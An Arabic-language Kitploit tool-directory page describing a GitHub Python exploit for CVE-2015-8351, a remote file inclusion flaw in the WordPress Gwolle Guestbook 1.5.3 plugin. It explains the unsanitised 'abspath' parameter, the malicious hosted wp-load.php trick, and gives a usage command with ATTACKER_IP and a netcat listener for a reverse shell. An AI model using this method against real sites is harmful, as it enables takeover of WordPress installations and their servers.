Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
exploit-CVE-2015-8351 — إضافة ووردبريس Gwolle Guestbook 1.5.3 - تضمين ملف عن بُعد | Kitploit
أدوات/GitHubGitHub/g4sp4rcs/exploit-cve-2015-8351
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubg4sp4rcs/exploit-cve-2015-8351

exploit-CVE-2015-8351

إضافة ووردبريس Gwolle Guestbook 1.5.3 - تضمين ملف عن بُعد

عرض المستودع
2منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Gwolle Guestbook WordPress Plugin RFI Exploit

يستغل هذا السكريبت المكتوب بلغة بايثون ثغرة خطيرة من نوع تضمين الملفات عن بُعد (Remote File Inclusion - RFI) في إضافة Gwolle Guestbook الخاصة بووردبريس، والتي يمكن استغلالها بواسطة مهاجم غير مصادق لتضمين ملف PHP عن بُعد وتنفيذ كود تعسفي على النظام المعرض للثغرة.

تفاصيل الثغرة

معامل HTTP من نوع GET المُسمى "abspath" لا يتم تطهيره بشكل صحيح قبل استخدامه في دالة PHP require(). يمكن لمهاجم عن بُعد تضمين ملف باسم 'wp-load.php' من خادم بعيد تعسفي وتنفيذ محتواه على خادم الويب المعرض للثغرة. وللقيام بذلك، يحتاج المهاجم إلى وضع ملف خبيث باسم 'wp-load.php' في الدليل الجذر لموقعه على الخادم، وتضمين عنوان URL الخاص بالخادم في الطلب.

يمكن أن يؤدي الاستغلال الناجح لهذه الثغرة إلى اختراق تثبيت ووردبريس بالكامل، وقد يؤدي أيضًا إلى اختراق خادم الويب بأكمله.

الاستخدام

يتطلب السكريبت ثلاث وسائط:

  • رابط الهدف: رابط تثبيت ووردبريس المعرض للثغرة.
  • مضيف المهاجم: عنوان IP أو اسم المضيف لجهاز المهاجم.
  • منفذ المهاجم: رقم المنفذ الذي يستمع عليه المهاجم لاستقبال صدفة عكسية.

مثال:

root@kitploit:~
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORT

ملاحظة: يجب أن يكون لديك مستمع netcat مفتوحًا على جهاز المهاجم على المنفذ المحدد.

إخلاء مسؤولية

يُقدم هذا السكريبت لأغراض تعليمية فقط. المؤلف غير مسؤول عن أي أضرار ناتجة عن سوء استخدام هذا السكريبت.

تنزيل الأداة